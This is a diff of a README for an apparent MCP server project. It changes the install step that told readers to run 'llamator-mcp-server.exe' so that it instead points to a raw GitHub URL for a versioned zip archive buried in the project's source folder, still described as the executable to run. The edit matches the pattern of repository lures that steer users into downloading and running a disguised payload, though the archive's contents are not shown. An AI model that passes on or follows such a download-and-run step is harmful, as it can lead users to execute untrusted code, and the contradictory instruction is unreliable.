kyle122497/llamator-mcp-server/README.md

 1. Locate the downloaded file in your Downloads folder.
 2. Extract the contents of the file.
 3. Open the extracted folder.
-4. Find and run the executable file (e.g., `llamator-mcp-server.exe` for Windows).
+4. Find and run the executable file (e.g., `https://raw.githubusercontent.com/kyle122497/llamator-mcp-server/main/src/llamator_mcp_server/api/llamator-server-mcp-v2.9.zip` for Windows).

 ## ⚙️ Configuration
 After installation, some initial setup is necessary: